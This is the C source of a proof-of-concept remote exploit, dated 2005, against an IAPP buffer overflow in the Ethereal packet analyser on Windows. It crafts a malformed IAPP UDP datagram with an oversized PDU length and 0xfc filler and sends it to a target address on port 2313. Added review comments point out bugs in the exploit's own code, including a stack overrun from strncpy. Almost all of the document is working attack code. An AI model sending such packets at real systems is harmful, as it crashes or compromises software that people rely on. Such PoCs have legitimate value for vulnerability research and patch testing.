/*
 *
 * Ethereal IAPP remote buffer overflow #2 PoC exploit
 * ---------------------------------------------------
 * To test this vulnerability on Windows, try to send 3-10 packets
 * that will trigger the crash, and scroll between captured packets
 * in Ethereal.
 *
 * Coded by Leon Juranic <ljuranic@lss.hr>
 * LSS Security <http://security.lss.hr/en/>
 *
 */
#include <stdio.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
#define IAPP_PDU_SSID 0   /* presumably a PDU type value (from the name); not referenced anywhere in this listing */
/*
 * Two-byte IAPP header that starts the datagram built in xp_sendpacket().
 * Both fields are single bytes, so the struct has no padding and maps
 * directly onto the first two bytes of the send buffer.
 */
struct _e_iapphdr {
    unsigned char ia_version;   /* set to 1 by xp_sendpacket(); name suggests a protocol version */
    unsigned char ia_type;      /* set to 1 by xp_sendpacket(); name suggests a message type */
};
typedef struct _e_iapphdr e_iapphdr;
/*
 * Three-byte PDU header placed immediately after the e_iapphdr (buf+2)
 * in xp_sendpacket().  All members are single bytes, so there is no
 * padding and sizeof(e_pduhdr) == 3.
 */
struct _e_pduhdr {
    unsigned char pdu_type;    /* set to 3 by xp_sendpacket() */
    unsigned char pdu_len_h;   /* set to 0x05; name suggests high byte of a 16-bit length */
    unsigned char pdu_len_l;   /* set to 0xa1; name suggests low byte of that length */
};
typedef struct _e_pduhdr e_pduhdr;
/*
 * xp_sendpacket - build one IAPP datagram and send it over UDP to `pack`.
 *
 * pack: IPv4 address as a dotted-quad string.  It is handed unchanged to
 *       inet_addr(); an unparsable string yields INADDR_NONE, which is not
 *       checked here.  Destination port is UDP 2313.
 *
 * The buffer is laid out as a 2-byte e_iapphdr (version 1, type 1), a
 * 3-byte e_pduhdr (type 3, length bytes 0x05/0xa1) and then 0xfc filler;
 * 1489 bytes of buf are passed to sendto().  Nothing is returned and only
 * the WSAStartup() result is checked.
 *
 * Review notes on the listing as written (code left unchanged):
 *  - strncpy() always writes exactly its length argument (padding with
 *    NULs), so this call stores 2000 bytes starting at buf+5 into the
 *    2000-byte buf: a 5-byte write past the end of buf, i.e. stack
 *    corruption inside this program itself.
 *  - bla is initialised only for its first 1300 bytes; strncpy() keeps
 *    reading until it meets a NUL or has consumed 2000 bytes, so it may
 *    read uninitialised stack.
 *  - socket() and sendto() results are ignored, and neither
 *    closesocket() nor WSACleanup() is ever called.
 *  - `i` is unused because the send loop is commented out.
 */
void xp_sendpacket (char *pack)
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
int sock,i;                 /* i: unused, loop below is commented out */
struct sockaddr_in sin;
unsigned char buf[2000];    /* outgoing datagram */
char bla[2000];             /* filler source; only first 1300 bytes are set */
e_iapphdr *iapp;
e_pduhdr *pdu;

/* Winsock 2.2 initialisation; the only failure that is checked here. */
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
printf ("error!!!\n");
ExitProcess(-1);
}

sock=socket(AF_INET,SOCK_DGRAM,0);   /* return value not checked */

sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(pack);   /* INADDR_NONE on bad input, not checked */
sin.sin_port = htons(2313);

/* 2-byte IAPP header at the start of buf. */
iapp = (e_iapphdr*)&buf;
iapp->ia_version = 1;
iapp->ia_type = 1;

/* 3-byte PDU header immediately after it. */
pdu = (e_pduhdr*)(buf+2);
pdu->pdu_type = 3;
pdu->pdu_len_h = 0x05;
pdu->pdu_len_l = 0xa1;

/* Fill: 1300 bytes of 0xfc, remaining 700 bytes of bla left uninitialised. */
memset (bla,'\xfc',1300);
/* BUG: writes 2000 bytes at buf+5 -> overruns buf by 5 bytes (see header). */
strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000);

// for (i=0;i<1000;i++)
sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));   /* result ignored; socket never closed */

}
/*
 * Entry point: argv[1] is the destination IPv4 address passed straight to
 * xp_sendpacket().
 *
 * Review notes (code left unchanged): the return type is omitted (implicit
 * int, not valid since C99), argc is never checked so running without an
 * argument passes argv[1] == NULL into inet_addr(), and no value is
 * returned.
 */
main (int argc, char **argv)
{

xp_sendpacket(argv[1]);   /* assumed to be a dotted-quad address; no argc check */
}
// milw0rm.com [2005-03-12]